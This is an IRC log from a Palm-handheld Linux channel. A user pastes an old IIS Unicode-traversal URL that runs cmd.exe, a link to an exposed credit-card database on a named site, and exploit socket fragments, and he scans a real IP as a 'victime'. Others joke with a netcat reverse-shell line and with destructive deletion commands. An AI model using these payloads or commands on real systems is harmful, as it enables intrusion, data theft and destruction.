**** BEGIN LOGGING AT Sun Feb 14 02:59:57 2010 Feb 14 22:46:48 hello @ll Feb 14 22:49:55 ph34R t3h 3v1|_ C0D3 :-E Feb 14 22:50:01 evilcode, hellp Feb 14 22:50:03 *hello Feb 14 22:50:25 something wrong with me ? Feb 14 22:57:11 hack chan ? or only talking chan ? Feb 14 22:57:23 Belldandy, topic Feb 14 22:57:57 hrm ... Feb 14 22:58:07 evilcode, hack chan Feb 14 22:58:24 not realy Feb 14 22:58:29 i don't see any hack here Feb 14 22:58:38 and no source no sploits no shell lo Feb 14 22:58:40 evilcode, try looking at the channel topic Feb 14 22:58:40 lol Feb 14 22:58:58 hackndev isn't for malicious hacking Feb 14 22:58:59 handhelds ? Feb 14 22:59:07 what this mean ? Feb 14 22:59:12 "This project aims to bring usable Linux environment to handhelds that run Palm OS. Get started running Linux on your PDA or smartphone by downloading a bootpack! Feb 14 22:59:16 " Feb 14 22:59:25 enigme, hacking is nothing malicious ... and never was Feb 14 22:59:45 ok nice Feb 14 22:59:46 enigme, hacker is a person who understands computers well ... Feb 14 22:59:54 u are a whitehat maybe lol :) Feb 14 22:59:58 marex, this I know -- nobody else ever seems to, though :) Feb 14 23:00:13 enigme, sadly that's true Feb 14 23:00:17 it possible to run linux on PDA or SmartPhone ? Feb 14 23:00:19 evilcode, what are you looking for ? Feb 14 23:00:25 nothing special Feb 14 23:00:32 evilcode, it is Feb 14 23:00:50 marex u can run them in ? Feb 14 23:01:06 evilcode, what do you mean by 'you can run them in' ? Feb 14 23:01:15 you mean on the hardware ? yes ... Feb 14 23:01:27 linux supports like 16 other platforms besides x86 Feb 14 23:01:29 marex ==> ( 00:00:23 ) ( evilcode ) it possible to run linux on PDA or SmartPhone ? Feb 14 23:01:46 what about Hardware detection and dirvers ? Feb 14 23:02:10 alpha arm avr32 blackfin cris frv h8300 ia64 m32r m68k m68knommu microblaze mips mn10300 parisc powerpc s390 score sh sparc um x86 xtensa Feb 14 23:02:36 sorry ... not 16, more ... Feb 14 23:03:01 evilcode, on handhelds, no hardware detection happens ... and drivers are generic so they work platform-wise Feb 14 23:04:22 ok ok Feb 14 23:04:28 i'm trying to understand u Feb 14 23:04:45 so i can run my linux on my smartphone 3D Feb 14 23:05:05 and he can detect my materials Feb 14 23:05:11 that's a good way Feb 14 23:05:14 evilcode, generally yes Feb 14 23:05:19 ok Feb 14 23:05:33 it's not that easy, but generally yes Feb 14 23:05:42 where are u from marex ? Feb 14 23:05:50 Prague ? Feb 14 23:05:53 Czech ? Feb 14 23:06:14 evilcode, no ... don't try anything on this IP, you don't have the skills to damage this machine Feb 14 23:06:23 lol Feb 14 23:06:33 i'm not trying anything man be sure Feb 14 23:06:34 trust me, it's secured well Feb 14 23:06:37 i would like only Feb 14 23:06:40 know Feb 14 23:06:50 i'm trying some bots in my channels Feb 14 23:07:00 evilcode, botnet ? Feb 14 23:07:03 mapping and detecting Proxy's Feb 14 23:07:13 :) Feb 14 23:07:16 evilcode, btw. I'm not from prague, don't worry Feb 14 23:07:17 not realy a botnet Feb 14 23:08:30 * marex things of rebooting into OpenBSD to make it 'easier' for hackers ;-) Feb 14 23:08:47 driver detection can happen but there aren't really any busses to enumerate Feb 14 23:08:56 lol Feb 14 23:09:04 so kernel already knows what hardware it's running on from the machtype Feb 14 23:09:10 this is the problem's the bus's Feb 14 23:09:12 t:) Feb 14 23:09:14 :) Feb 14 23:09:21 what's the problem? Feb 14 23:09:30 my bot are realy stupid :) Feb 14 23:09:32 lol Feb 14 23:09:44 he give me this Feb 14 23:09:57 Connectivity Test Detail : marex (vasut.kolej.mff.cuni.cz - 0 (Czech Republic)) Feb 14 23:09:58 lol Feb 14 23:10:19 i need write some new lines to make it better lol Feb 14 23:11:35 it can ping Feb 14 23:12:18 no it's not only the ping Feb 14 23:12:27 it a compined script for my bot Feb 14 23:12:51 what does it do? Feb 14 23:12:51 to detect proxy's Sock4 and sock5 then locality with all information possible Feb 14 23:12:57 it looks like ping and rdns Feb 14 23:13:08 ping through socks? Feb 14 23:13:16 and after that i'll make nmap attach script to this bot to make scan for ports but need more time :) Feb 14 23:13:48 it's pack code i'm writing Feb 14 23:14:11 MSPLOIT + nmap + NC + c99 shell + unicode generator :) Feb 14 23:14:24 it will be live CD :) Feb 14 23:14:37 but i'm only in 30% of my project Feb 14 23:14:46 so marex don't worry i'm not trying anything :) Feb 14 23:14:52 nmap -P0 --- Feb 14 23:14:52 Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-15 00:14 CET Feb 14 23:14:53 All 1000 scanned ports on --- (---) are filtered Feb 14 23:14:53 Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds Feb 14 23:15:09 cool Feb 14 23:15:16 nmaped :) Feb 14 23:15:24 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) Feb 14 23:15:24 connect=s.connect((sys.argv[1],21)) Feb 14 23:15:28 oups Feb 14 23:15:29 sorry Feb 14 23:15:30 happier? fine ... Feb 14 23:15:32 unicode generator? Feb 14 23:15:32 mistake Feb 14 23:15:41 what's c99 shell? Feb 14 23:15:46 yep :) Feb 14 23:15:51 unicode generator Feb 14 23:16:08 c99 shell it's a trojan to root some servers :) Feb 14 23:16:14 evilcode, ah btw. I'm teaching administration of UNIX systems on local university :) Feb 14 23:16:19 * enigme sighs Feb 14 23:16:28 that's python? Feb 14 23:16:30 marex, very nice :) Feb 14 23:16:32 marex good to know this Feb 14 23:16:37 marex, are you a professor? Feb 14 23:16:43 anybody know clean way to open a server socket in wscript? Feb 14 23:16:44 are u doctor ? Feb 14 23:16:48 enigme, not yet Feb 14 23:17:18 what's the unicode generator needed for? Feb 14 23:17:22 tmzt sorry bro i'm blachat Feb 14 23:17:27 evilcode, btw. is argv really the argument passed to that program ? Feb 14 23:17:27 don't use the clean ways :) Feb 14 23:17:37 evilcode, from command line I mean ... Feb 14 23:17:39 marex, I'll have to bother you for help -- I'm co-teaching a student-taught UNIX sysadmin course :) Feb 14 23:17:53 I just want to make a ip to serial proxy Feb 14 23:17:56 enigme, we're teaching OpenBSD here ... but you can try Feb 14 23:18:03 marex what d u mean ? with my line ? Feb 14 23:18:11 evilcode, yes Feb 14 23:18:21 what's the problem with my lines ? Feb 14 23:18:40 argv is right, argv(0)bis the $0 or name of the program Feb 14 23:18:51 I'm asking if you're doing the function call with that's passed to the program from command line without checking the input Feb 14 23:19:09 he is Feb 14 23:19:10 s/that/what/ Feb 14 23:19:15 lol Feb 14 23:19:21 no it's an exploit Feb 14 23:19:27 int(s) would be better Feb 14 23:19:31 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) Feb 14 23:19:31 connect=s.connect((sys.argv[1],21)) Feb 14 23:19:31 print "[x] Sending Shellcode..." Feb 14 23:19:31 s.recv(1024) Feb 14 23:19:36 an exploitable exploit, the best kind Feb 14 23:19:40 it's crap ... Feb 14 23:19:45 yeah lol Feb 14 23:19:46 tmzt, hehehe :) Feb 14 23:19:59 hmm not in Feb 14 23:20:05 since it's a hostname Feb 14 23:20:23 :) Feb 14 23:20:35 don't worry about my code men Feb 14 23:20:38 try good\0bad\0 Feb 14 23:20:49 that's why i'm evilcode :) Feb 14 23:20:58 stupidcode Feb 14 23:21:03 nah it's cool Feb 14 23:21:04 tmzt, calm down Feb 14 23:21:08 it's your toy Feb 14 23:21:12 ??? Feb 14 23:21:15 sorry man Feb 14 23:21:17 sorry Feb 14 23:21:29 anyway thx for discusion Feb 14 23:21:31 marex: yeah Feb 14 23:21:51 evilcode, don't play with stuff you don't understand Feb 14 23:22:00 evilcode, you're likely to get yourself into trouble Feb 14 23:22:03 ok teacher Feb 14 23:22:09 but im' not playing Feb 14 23:22:16 I think when I switch my router to linux and nl80211 firmware Feb 14 23:22:17 i'm only showing u some lines Feb 14 23:22:36 it's a payload from metasploit shell Feb 14 23:22:41 you still haven't explained the unicode bit Feb 14 23:22:42 shellcode Feb 14 23:22:51 ok tmzt wait Feb 14 23:22:55 i'll give u demo Feb 14 23:23:38 * marex expects weird stuff to happen Feb 14 23:25:32 here is some old exemple Feb 14 23:25:35 * tmzt worries a little Feb 14 23:25:38 it's a scriptkidding maybe Feb 14 23:26:04 * marex h4Z 9R34+ p|-|34R!!! Feb 14 23:26:37 here is it : => /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..>./winnt/system32/cmd.exe?
>/c+dir+c:\inetpub\wwwroot\*** Feb 14 23:26:48 IIS server Feb 14 23:26:57 but it's realy onld Feb 14 23:27:14 oh yay fpse Feb 14 23:27:16 hm ... and what does it do ? Feb 14 23:27:27 lists files Feb 14 23:27:29 now it's not work in the IIS Feb 14 23:27:41 but if u find exploitable IIS server Feb 14 23:27:43 was that in a url? Feb 14 23:27:49 IIS ? that microsoft webserver parody ? Feb 14 23:27:52 u set only www.victime.com/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..>./winnt/system32/cmd.exe?
>/c+dir+c:\inetpub\wwwroot\*** Feb 14 23:28:14 net stop inetsrv Feb 14 23:28:16 and u are root in system Feb 14 23:28:21 u upload nc Feb 14 23:28:33 netcat then u listen in port and u are in :) Feb 14 23:28:44 winnt is 2000 or less Feb 14 23:28:51 2000 Feb 14 23:29:10 so is that on a url? Feb 14 23:29:17 and does fpse have to be installed? Feb 14 23:29:25 fpse is msft's very own trojan Feb 14 23:29:42 here is another worked exemple :) Feb 14 23:29:42 they replaced it with indexing later Feb 14 23:29:50 ==>http://www.hkstylesupply.com/photo/hkstylesupply.mdb Feb 14 23:29:59 then msrpc because it's faster Feb 14 23:30:01 u klik and u will download credit ccard MDB :) Feb 14 23:30:11 and then the ower grid accidently shorted out Feb 14 23:30:18 and nobody saw it Feb 14 23:30:26 because the bigscreens were busy rebooting Feb 14 23:30:43 tmzt this is the c99shell picture => http://aknow.prevx.com/content/blog/c99_owned.jpg Feb 14 23:30:50 that's sombody made a mistake Feb 14 23:30:59 mdb shouldn't be in the data directory Feb 14 23:31:22 :) Feb 14 23:31:23 it's probably hosted and it was easier for them to use odbc file driver Feb 14 23:31:46 some admins don't realy do a good job in some servers :) Feb 14 23:31:56 question might be how somebody knew the filename Feb 14 23:32:07 since you wouldn't see the asp Feb 14 23:32:20 coze it's an old rooted server Feb 14 23:32:25 with c99 shell Feb 14 23:33:35 someone have a good scanner here ? Feb 14 23:33:38 nmap Feb 14 23:33:41 or nessus ? Feb 14 23:35:29 yea, why ? Feb 14 23:35:43 what scanner u use marex ? Feb 14 23:35:53 nmap Feb 14 23:35:59 and netstat on the other side Feb 14 23:36:09 ok Feb 14 23:36:12 * Sleep_Walker uses HP, does it count? Feb 14 23:36:17 and what linux os no ? Feb 14 23:36:22 :) Feb 14 23:36:32 * enigme chimes in with a vote for Fujitsu's scanners (ADF + flatbed :) Feb 14 23:36:35 Sleep_Walker, hehe :) Feb 14 23:36:50 darn, you beat me Sleep_Walker :) Feb 14 23:36:52 * marex has HP with printer Feb 14 23:37:15 evilcode, I don't get your last question Feb 14 23:37:35 i need scan host maybe it's a IIS 4 Feb 14 23:37:46 or 6 Feb 14 23:38:00 i'll scan Feb 14 23:38:38 ./showme -O -T4 -sS -vv 64.78.2.37/130 Feb 14 23:40:38 80/tcp open http Microsoft IIS webserver 6.0 Feb 14 23:40:46 OS details: Microsoft Windows 2003 Server SP1 Feb 14 23:40:52 this is a good victime :) Feb 14 23:41:19 ok ppl it was realy nice to talking to u Feb 14 23:41:28 must go away now Feb 14 23:41:31 I pity you ... really Feb 14 23:41:36 maybe another day ...... Feb 14 23:41:40 or never Feb 14 23:41:43 :) Feb 14 23:41:49 enjoy the slammer Feb 14 23:41:51 hrm ... Feb 14 23:42:10 that was impressive... Feb 14 23:46:15 mhm Feb 14 23:46:45 * marex goes to break PXA3 probably ... Feb 14 23:47:20 marex, your current irc client lacks useful keyboard shortcuts or you did have fun? Feb 14 23:48:05 pxa3? Feb 14 23:48:22 Sleep_Walker, I have all the shortcuts I need on my keyboard if you mean /kick /ban /kickban etc. Feb 14 23:48:33 I have that logitech G15 with programmable keys Feb 14 23:48:59 wow, ultimate op keyboard! Feb 14 23:49:21 rm -rf / should be somewhere there too Feb 14 23:49:28 forkbomb too Feb 14 23:49:36 tmzt, pxa3, yes Feb 14 23:50:08 * Sleep_Walker is street_walker with Netwalker :) Feb 14 23:52:05 nc -e cmd marexip 1004 Feb 14 23:52:41 on marex side: nc -p 1004 well, .cmd Feb 14 23:53:13 tmzt, what's that ? Feb 14 23:53:31 deltree /s /windows Feb 14 23:53:40 deltree /s /y /windows Feb 14 23:53:48 deltree /s /y \windows Feb 14 23:54:14 nc -e runs a process and attaches it to a socket Feb 14 23:54:33 except that if you run it on your end the commands run on your end, not the target Feb 14 23:54:51 normally it's used as a tiny telnetd by whitehats Feb 14 23:55:11 so it's nc -p 23 -l -e sh Feb 14 23:55:59 it's saved me a few times Feb 14 23:56:06 nc itself is not evil Feb 14 23:59:48 nc is great tool for creating P2P netweorks using shell scripts ;b Feb 15 00:02:31 howbis that? Feb 15 00:14:49 tmzt, btw. what was your question about PXA3 ? Feb 15 00:15:43 how do you intend to break it? Feb 15 00:17:39 just using socket for commands opening sockets for data on demand Feb 15 00:17:59 I did such script long time ago Feb 15 00:18:22 unfortunately it wasn't used even by my friends :b Feb 15 00:18:31 hmm I see Feb 15 00:18:31 tmzt, hacking around SMEMC right now Feb 15 00:18:43 what's smemc? Feb 15 00:19:18 static memory controller Feb 15 00:19:39 what are you doing? what hardware is this? Feb 15 00:19:43 obsd port? Feb 15 00:19:46 it basically drives everything memory mapped Feb 15 00:19:48 no ... in linux Feb 15 00:19:51 pxa3 Feb 15 00:20:01 interesting Feb 15 00:20:05 that include the 3d chip? Feb 15 00:20:23 what 3d chip ? no ... Feb 15 00:20:23 and all soc periph space? Feb 15 00:20:29 yes Feb 15 00:20:32 what's the static memory? Feb 15 00:20:38 3d chip in pxa3xx Feb 15 00:20:47 there's nothing like that Feb 15 00:20:49 it's documented on mvl website Feb 15 00:21:01 it's not very powerful though Feb 15 00:21:03 sorry Feb 15 00:21:03 you mean GCU ? Feb 15 00:21:06 2d and video Feb 15 00:21:11 not 3d Feb 15 00:21:17 GCU then ... Feb 15 00:21:33 that's in 310 ... I have that one in LT Feb 15 00:21:38 ah Feb 15 00:21:42 lt Feb 15 00:21:51 littleton Feb 15 00:21:58 okay Feb 15 00:22:14 I played around with that kernel to start a port for some weird phone Feb 15 00:22:21 but they switched to ipaq later Feb 15 00:22:27 ipaq codebase Feb 15 00:25:45 littleton is pretty cool actually :) Feb 15 00:57:17 well ... patches sent **** ENDING LOGGING AT Mon Feb 15 02:59:57 2010